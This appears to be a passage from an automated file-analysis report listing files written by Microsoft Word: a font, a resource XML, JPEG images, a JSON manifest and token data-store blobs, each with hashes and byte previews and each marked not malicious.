                              SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
                              Malicious:false
                              Preview:........... OS/29....(...`cmap.s.,.......pglyf..&....|....head2..........6hheaE.@v.......$hmtx...........@loca.U.....8...Dmaxp........... name.P+........post...<...... .........b~1_.<...........<......r......Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................k......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with very long lines (1298), with no line terminators
                              Category:modified
                              Size (bytes):1298
                              Entropy (8bit):5.077301845740677
                              Encrypted:false
                              SSDEEP:24:2dtatFtAzXR0X5qBiX5qGXX5qyjX5qgZX5q4d3X5qsHX5qfYX5qO:cGEbRNBfGQyEg+4dwsgfJO
                              MD5:70EFA566464C23B4E36A63A2E54795F1
                              SHA1:71D018AAF38ED9178717D2871810F8FDF4A5FA88
                              SHA-256:186DF18340B77010991449EA87475CAE6651432084C1AFC7AFE5AEE779B42DDF
                              SHA-512:BA840DF32DB645E461392400DA7F01AC57EB2F722D1A7C8AD22551D8B83FAB38EE69D328248871905791F23FA8604A48F7DBD3DDD231C3E506B5D5C1134C5712
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?><root><version>1</version><Count>8</Count><Resource><Id>inkeffectsilver_0</Id><LAT>2024-07-22T13:58:48Z</LAT><key>inkeffectsilver.jpg</key><folder>Graphics</folder><type>10</type></Resource><Resource><Id>inkeffectrosegold_0</Id><LAT>2024-07-22T13:58:48Z</LAT><key>inkeffectrosegold.jpg</key><folder>Graphics</folder><type>10</type></Resource><Resource><Id>inkeffectgold_0</Id><LAT>2024-07-22T13:58:48Z</LAT><key>inkeffectgold.jpg</key><folder>Graphics</folder><type>10</type></Resource><Resource><Id>inkeffectlava_0</Id><LAT>2024-07-22T13:58:48Z</LAT><key>inkeffectlava.jpg</key><folder>Graphics</folder><type>10</type></Resource><Resource><Id>inkeffectgalaxy_0</Id><LAT>2024-07-22T13:58:48Z</LAT><key>inkeffectgalaxy.jpg</key><folder>Graphics</folder><type>10</type></Resource><Resource><Id>inkeffectbronze_0</Id><LAT>2024-07-22T13:58:48Z</LAT><key>inkeffectbronze.jpg</key><folder>Graphics</folder><type>10</type></Resource><Resource><Id>inkef
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 540x540, components 3
                              Category:dropped
                              Size (bytes):51359
                              Entropy (8bit):7.951666710600864
                              Encrypted:false
                              SSDEEP:1536:R0RcgzFbKPP60jIl5/IwaJczf3CtvRX5/wWi5:bgxbKPid/IwnzqJ5E5
                              MD5:C78ADBD2D46B0E9C1D82F07CE097886C
                              SHA1:FB1112D34E16E16AEE78EEDD4FC646ED9BE2AF93
                              SHA-256:AEBFCC397AEF37AFE927595078B879AB56A3EEA1725B49E5716DEBCE74B8757C
                              SHA-512:0EE4D259906BA938FAF8C1A0ED1A77FB4AD16313839B8790955448F7219806B4B70BA318A359F4724031C62300D4A24E0C63CFEE233EF25B3AE907F5F09AB89B
                              Malicious:false
                              Preview:......Exif..II*.................Ducky..............http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="adobe:docid:photoshop:cf966bc7-2e03-1179-b805-d8edc999fcb6" xmpMM:DocumentID="xmp.did:630AA0AD350711E7A8B5D05185B6C702" xmpMM:InstanceID="xmp.iid:630AA0AC350711E7A8B5D05185B6C702" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:93DCC65027C411E7BFED96D58044CBC1" stRef:documentID="xmp.did:93DCC65127C411E7BFED96D58044CBC1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............!.!4..4B/)/B=3223=FFFFFF
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x540, components 3
                              Category:dropped
                              Size (bytes):39125
                              Entropy (8bit):7.979802521866709
                              Encrypted:false
                              SSDEEP:768:WCjr07kqJ96I8cTgooRTYWHj3FkbeP2rcZ7EHA6s5:507kq2SEo+TLjTw+7EHTe
                              MD5:239B06776C5028E8696BE5DDE3056F40
                              SHA1:5BA5F0F7762296CBC0A066608E611AAA4D386F75
                              SHA-256:D8A45BC6BD592ED29DC7F74666B6C22D4ADDCA52261FDF2A929CE7205FC4EFCA
                              SHA-512:7B5319E22DC8D422C9974A6DE23B094CCBC89861FFBBA85C5A19137B1A7CE3224E34978F2AF5777BB357571379B998DCBB30951DBEF32BBFE8C73929D2F90B86
                              Malicious:false
                              Preview:......JFIF..............................)&""&)>,0,0,>^;E;;E;^SeRMReS.vhhv...............................)&""&)>,0,0,>^;E;;E;^SeRMReS.vhhv.........................."..............................................BKB.@..h.Z.Z....ker..Xd!.E........y.e.<...tNoK...:..B..R...,.uAM....H..Rd..h....%Q...'#.......JRcN..pGL{3.1....!C.8..y.R..3....$.%..H.......eoG..\..M.........5..........c.F{....j.....&?J.*.ad..Y3[..2\..5)+..Qh....g.)....biQ$@..uCV..0.&+..#..,.B...JR.|lp.C...{.V.;N$.m.w.j..;"..:.$....Z.sj...!,m..G5...l...Y.l/.J....:.=.;u,:.G.....u/.u.u.#5..Y.C....DI......t..B.....f..v(t.......0H..M.d.5e.J.l..(...C.K-...S4..HR.uz>....f.q.jU..$..q.....QG....%.=.@....\.t....v....f...r:;[.n..W/.&....._..Q?o9.S.....s.Y....T..yT...;T..c.G.Lk..tf.0 ..x.".#Ptw%n!.P......%.]+yWb`lY.y&k...t..pr1=I.Z.A....i.......I..k.{.!.G8........vi1]./\.6_....Z...:X..1...u ..\.n...<.-}...D.>q..G...F......?Z.V.\..hX.....#.Ec...H..s...m...\..6.[V&.V.Fwv4G6.!%.Yg...3...7.m.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x540, components 3
                              Category:dropped
                              Size (bytes):45967
                              Entropy (8bit):7.9705077862907885
                              Encrypted:false
                              SSDEEP:768:IuC14Fy5SyHdNNbx4IsRctKVqjrk+wiM6SNlM3jDbS+TFhNdc:IuC+RkRSjyxoPNl6DbSqhNdc
                              MD5:041305375CE26DE66A1405C06819D3CD
                              SHA1:4448296BBA3BD8ACF34D1AF5C4CFEBDFD6B07919
                              SHA-256:4BB1E1D1139CAFDD96D4C98F78086B3677A68A90ABCACE31250F1442C9E528B0
                              SHA-512:F15A172058470337F9EA00F5757A605A0A069A7C232BA6015B2839CEC27DCEA30E81BEFD811AC15D9B442648FFD9F07B82B1E104F86890C2F2680242EC32958A
                              Malicious:false
                              Preview:......JFIF..............................+'$$'+A.2.2.Ac=H==H=cWjVPVjW.{mm{................................+'$$'+A.2.2.Ac=H==H=cWjVPVjW.{mm{..........................."..............................................rZ.5E[.lH...Nn..r..chh9.E.`..]9...!xS[.{...G.i.vUG.d!+Pu#. .%sF.GE.*.....W..&...zo..l...og....F.Q..H......=....=.q.....x...R..P.)V..<.....L......>Y."O=.T.."s..Y...gtx..r..A....oAUg*>.c....hx.1.gF.u..,.|.yPT.R......B....$!...,.P..=$t..@...V5I.i..j..s55.+.BBMJ.<4I.F|.j.>..Tq..$....|....f|r.y./e.]:9;/........i.t..6...D.I.......Qs.CU.0.KP,..J...N.A-Y.........qp.+..._6Y.}..-5.5E#.x..J...+.R*J..X....Tc.o.I....1...Fp."...J+..L...8.l.k...{..'.L..X...Vu.t.h..$h..;."=f.c......uj.*..1...4..:..pb....N...D...zn[.X-v...X.g....C,.].UaX.Q...."..=4.\e.V.~.5.....qI.....T/M.Hl.F.y.S%E]f.G.<....+p...5U.kT|.Gs..z=.D...n.|.t~..)..2.:.........B.Jf.S..C.#.........J.Y...-..U..k..A.K...V.@.GEpb...d.....W...D......#.....'X..J....'.i.Kw..+.6.#+..J....,.}B.Tbh.i
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 540x540, components 3
                              Category:dropped
                              Size (bytes):46495
                              Entropy (8bit):7.9661137194510605
                              Encrypted:false
                              SSDEEP:768:VQ++TcRGfH5eNodvzDnMex2FzuOojrl+X4H+91i57BR/SUcKkuMw2D:cTmQHICzA7ijrlZ+9g57BZSUcKk5ww
                              MD5:437A5A184681BCFC608FD1E97D708616
                              SHA1:7D84FBE6D4DED5A3C98414F458CE071BBC9035BB
                              SHA-256:D1F0B68D87F6B09555851C30F0352A07952B5B0885EFB8D3E3FF5CEE4279E87B
                              SHA-512:6B2D7542117A4F4DA956CB7EF4C09F69728F793C0DE6BAAC6790F73E923600EABA0FC54D1C7082483244EF1DA0246158C69143CD297FA08131B302AAD04B5003
                              Malicious:false
                              Preview:......Exif..II*.................Ducky.......2......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:9ddd68a3-599c-c447-b762-dfdcc6ed67f0" xmpMM:DocumentID="xmp.did:6DA3B3432F9611E79EC5C8FB588A0A7D" xmpMM:InstanceID="xmp.iid:6DA3B3422F9611E79EC5C8FB588A0A7D" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:171e06c7-6010-1747-9ee0-2032452c22f2" stRef:documentID="adobe:docid:photoshop:647e5738-1e35-11e7-9c56-d2f51c83e137"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 540x540, components 3
                              Category:dropped
                              Size (bytes):51762
                              Entropy (8bit):7.969551469107947
                              Encrypted:false
                              SSDEEP:1536:2RjFVIGWSX55YGjQQq35KuAt85LMn7Tz+dR8jG/t:2RhVIiiWQ9sxnLGR8jG/t
                              MD5:B3DB04E08D530D82F33A9B09EA528595
                              SHA1:C503E80D02BACAC44C1E53D2C2289F5702B0C829
                              SHA-256:35711A8D24732AEB50300EACD3E231BFD5676D6575830240BF7111BFF040B9E5
                              SHA-512:C6B66DC04793FFAD8C7CEE1908334C664D122B6D444B8ED534E20E5FA3A7ED22062697C759BD8236910BD5E88D321D11C4BAC7EF40B64E3E69620AA7AEF26B1D
                              Malicious:false
                              Preview:......Exif..II*.................Ducky..............http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:bbfa45cd-c1f9-7e4b-bdf0-5a08d3643b82" xmpMM:DocumentID="xmp.did:7E9BDF902F9611E79068964DF66B6A5F" xmpMM:InstanceID="xmp.iid:7E9BDF8F2F9611E79068964DF66B6A5F" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:bfdf1a42-cec7-c342-962a-2f28aa7f0712" stRef:documentID="adobe:docid:photoshop:21012dab-1e31-11e7-9c56-d2f51c83e137"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x540, components 3
                              Category:dropped
                              Size (bytes):77636
                              Entropy (8bit):7.98325572479678
                              Encrypted:false
                              SSDEEP:1536:GQvLaOfOKaf5ZKLzFxDZsDYlV4uCD258Vds+7RWiakyvggK:mOOKahZoZqY+uDCVe+Aizye
                              MD5:DEE12646BC7E105B3A97555A5AD46F1F
                              SHA1:D3C1F8FAFD06682514F2A88B5DD4B2D0BB1C9D0A
                              SHA-256:F47061DFB3F3312AF65E739C09EF51B0F0C2DE21FDCD344C35B5E9C37665CFD2
                              SHA-512:3A94C1975B50995BC368376423203F072417C83C4A65312122C0258075EFA6C0686D01A4B9CEF67D30012D0509DBA69D03921E9E6A6171C1F9E52690D5C2CF7B
                              Malicious:false
                              Preview:......JFIF.............................."...."4%(%(%4N191191NETD?DTE|bVVb|.yry..........................."...."4%(%(%4N191191NETD?DTE|bVVb|.yry......................"..............................................\.gI.:SI1F....Q..)._.t...9..l..5..++T).R..lQk<..H}.mS.Z.~..d......r~...W+.\.b9.i.A......Q..D.w.|..#k*......3.&*V[d...UD3..Gw?G.........T..a....m.Zi..Q4.ltL.].-......j.B.F.+..gN9......ch4.3.D.s..w..Vy..lRm..qh-rP...u.....+....=.2..i.h..dz:...z.,F..;....b..Im..c.5.#.=.......7.....\..G..]l...O3R1?.....r.i.'..~.h...|.R.j.p0y../F.iR..:......iK.m.X..`".:.4v..........i......9.0..l}><..6..".*..SEc....0u.r.&...Cl...S..f.|....v...-.v.lA.y....8........F58.>|.W?..)..X:........]2...3R...s.\.S..".&...g....H..rT......XR4.K..L..=.......#..C'...._>-.S.RRoH.]..B>'...{.9.^K.u./y..Q3Z...g......?.f#X....yoK.%X.`P`K/;:..u-.4..+....."_Q..kU..:...._.@5..&X.t..J....e...t.`.k.."HZ...V.gln....b .....U.0.>.jk.b\t.R...^..C.N.........w..-.AqEk...c.f...[Cw\.XKF...{.......'.9.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 540x540, components 3
                              Category:dropped
                              Size (bytes):42587
                              Entropy (8bit):7.956158176110853
                              Encrypted:false
                              SSDEEP:768:33uVCSrPcSrBbXGFz+dT+YrUjmJ3/Tm14bFXBFfP+EIbeIIoAuYY4so2/EKchzum:33uV74StXhSYrUiJvTsCNjNIbz6pAEKk
                              MD5:481D6C397EC9255C7158948ECAEE6585
                              SHA1:F6692C7064A6E54991283963DA5190C179753D19
                              SHA-256:EDE39E66268900159B6B80106B11EF74539F5077D8206DEEAD9B98E8F3CFD176
                              SHA-512:5B4BC810879E55F712E0E860FB4D4ADE54297DC574C1658CD3E61EDC8D0AAD9B0EFED16EAA347B663F1271207BD2B858B8644B333BE98CFB0C6536279A8950BE
                              Malicious:false
                              Preview:......Exif..II*.................Ducky..............http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="adobe:docid:photoshop:cf966bc7-2e03-1179-b805-d8edc999fcb6" xmpMM:DocumentID="xmp.did:9328F00B350711E7AC20BD1A5FC75C1C" xmpMM:InstanceID="xmp.iid:9328F00A350711E7AC20BD1A5FC75C1C" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5BC0E725279811E7BFED96D58044CBC1" stRef:documentID="xmp.did:5BC0E726279811E7BFED96D58044CBC1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................$..$-"."-)#""#)8/////
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x540, components 3
                              Category:dropped
                              Size (bytes):38755
                              Entropy (8bit):7.969372339631151
                              Encrypted:false
                              SSDEEP:768:xIw5we0JUmH9lDEt7ABvuRYLZ2CjOkqwP6HtSbIDNEaP2bu4:xIeweU9uABvkYLZ2Cj5PhIefu4
                              MD5:D1895189ECEEF4679EAA001B3F779DB3
                              SHA1:FC4AAA7A7F84C806F042A80E1F90B8E7236A8559
                              SHA-256:3D832CABF1C0DAAA5314F32A8E412E36F5628F6D2A14A021901D667773B382D3
                              SHA-512:E44A6E7AA7E2BEE1C1C5635AC255BBCB361D2532A4169F0D1F757EBBAA384B11B1635D932CD44E1748821459F53B81EF79B6642080C77F41BC4D93C8B73F312E
                              Malicious:false
                              Preview:......JFIF.........................!#.#!0-))-0I48484IoEQEEQEobwaZawb..{{...........................!#.#!0-))-0I48484IoEQEEQEobwaZawb..{{...........................".............................................`:y.C....(.$e.RFmA..QcW..x..I....9..l...u.Rak.J.W....:.F:.Kh`+....CU.QU.g.^..ps.|..4..1CN^.N.b...[....Lt..S...K.....dFLv......yJ.&...?"u..j.....d.F....r...<.....t.D......'Hv I%..^iKI..p..........A..i...u9(^ZS. .'J."l.M.uFE...T....,:8..w..JfJ.K....w,....EE...x........v)...e..=......v..A.{J...].4f1....Y..s.i2nn....}h9....^}...u..W.*...z..Vw.bk.bp......,.... .2.fS...U:dB....r:..N..uG..;b..\m.=z,+.^A....JV*.+...6..l..!.(.Te.k9.*.J..s.5...P....IVF.i$...OA 77D.K x....R.0..nr. }...2g .....Xi...b]E.E.shO..i3G].i..v........jt.L.YG;.T..n2n.d..N.mi..Jl.#......yK...\..al...m.]..e.j.D..eA...Q..~~.F..*..4....0u..<..2.g.......!......].9cF.IX..g3.:n{j.l.......ON.|f....}....qz.!..Elc.X.,.t.j.j;.....I.m.X..sR..0^........;N..N..U..Z
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):8515
                              Entropy (8bit):2.376758026536063
                              Encrypted:false
                              SSDEEP:192:OGEGGGBGcGSGwGdGKGjWqGjWUGjW3GjWiGjWAGjWUGjWTGjWwG/zhGzPhGjf4:zJbwx3F8f02FU+UJiUsk
                              MD5:53D49444EAF92E0CF5D2985CCAEDE42B
                              SHA1:DA2D6C55752243AA5E638750F038DADF3C9FE6CC
                              SHA-256:722A39658D2F3D5E333874F23485CEA9DA2B79EDA454FA7F5A9FEFBFDB9B2AD8
                              SHA-512:B59D16AE8DCB2D9F02BF7CD594A94D140C9CB308DECFEEDF89B9C166657D8B6BD97FA7CFCF97F0D45E184A470B209F28F1ECC420C5CBF8D88D6E0E1C3AB48064
                              Malicious:false
                              Preview:{.. "MajorVersion": 1,.. "MinorVersion": 5,.. "ResFamily": [.. {.. "Family": "InkEffect",.. "Res": [.. {.. "n": "inkeffectrainbowglitter",.. "sub": [.. {.. "sn": "",.. "sid": 0,.. "ext": "jpg".. }.. ].. },.. {.. "n": "inkeffectgalaxy",.. "sub": [.. {.. "sn": "",.. "sid": 0,.. "ext": "jpg".. }.. ].. },.. {.. "n": "inkeffectgold",.. "sub": [.. {.. "sn": "",.. "sid": 0,.. "ext": "jpg".. }.. ].. },.. {.. "n": "inkeffectsilver",.. "sub": [.. {.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):2278
                              Entropy (8bit):3.844562966056304
                              Encrypted:false
                              SSDEEP:48:uiTrlKxsxx8xl9Il8uFFViLgYbWmrF7qld1rc:vQYZVicYbWCF79
                              MD5:8DD4EE04D7AE71479C85CADB883C8A89
                              SHA1:CDA4C6A6E52E90900E8463E952DD8E63FF67D072
                              SHA-256:B556853174CF0717396ABA6729FB0B46C742C5BC85BA7F44485392A5F7BBE423
                              SHA-512:2C7ECAEC26AA6CF55AFC8D13DEA7E853C8AE9EB16B7E99B8526F7288D0BCA92BED140B41142ABF20307B575F1FDA674EC6FB79FF69372CBC6975FD977F541C62
                              Malicious:false
                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.I.0.+.g.U.f.c.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.0.i.K.n.x.M.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):4542
                              Entropy (8bit):4.005734687659148
                              Encrypted:false
                              SSDEEP:96:pYZV/8ktGoZ16N27JN30Nc7Q2QEzakdug6/e:p20kkoZ16NCNZQ8vduJG
                              MD5:7A1379196918073CB3372B4DECE216FB
                              SHA1:345BCC6C6CEF61268F6D22625DD457677ED9EE1C
                              SHA-256:A604069536EA8FBB617CFC8DB42C01FB2F5A5D2A5A4320181C33A05803A4AC71
                              SHA-512:FE8ECE6FD4430AD2D05C24E0D6A63BAE1A2E925F26B0369724FEA21C67AF19B511D9B0DBFE01848DDF13E69DE4599D45B73F76D9B9A5CBBB6D25C0B27BEFBDAE
                              Malicious:false
                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".k.r.R.S.Z.z./.c.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.0.i.K.n.x.M.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x518, components 3
                              Category:dropped
                              Size (bytes):79621
                              Entropy (8bit):7.949654755512444
                              Encrypted:false
                              SSDEEP:1536:EJJt5rmggmHt1zVpigR5lV4Bj1yh0/fakUhx4ZnfO8gf:EJJ3mg9/zVpigR5lw1HabP4ZfOx
                              MD5:54A07C35DADB508F554F0ED25AA155B3
                              SHA1:84FAC4D81E2AF4E920E4971F8A5D53AC4A8C6BDA
                              SHA-256:94EE01362EE9EE7E61A1A62BD197CFF851A64B1DE02AAFE24C1E0A464E4A6036
                              SHA-512:D9550DA2511C031F863C6DBDBEBE09E58E3DB74BC7EB564BF7667F8C8F12A55C155092074EDC2FF66AEA6AB7EF630E6625D7F50B68F4EF3215858A407F5320E1
                              Malicious:false
                              Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................I.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 837x754, components 3
                              Category:dropped
                              Size (bytes):66364
                              Entropy (8bit):7.930881392262679
                              Encrypted:false
                              SSDEEP:768:UYytYytYy/OGTWD1qufcR9kyKfMhzEQnsi0Bm4/eevUAGEdUBS00dWX4VLZG:UJJLOGxJDiUiQnR6m4WAUEdUkgXM1G
                              MD5:FA62B61B2E012E56787AD09FF660B32A
                              SHA1:32F29245140B72BD99D4C42408EDA9DFE4F088CC
                              SHA-256:643C921D41C123EB27A5BED51AF0F611EA7ECB4EFD3A5FA34DE8FFBC8F5781FD
                              SHA-512:FB7145BAC331C9A246C49D1E9854398CF65DF6B023BC0E3448A10A4759FB6DA8D60D90316E29991FDE559D0E43A1D5BB5EA3D5837F284DEA3B9EED0143A1D3B6
                              Malicious:false
                              Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................E.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ 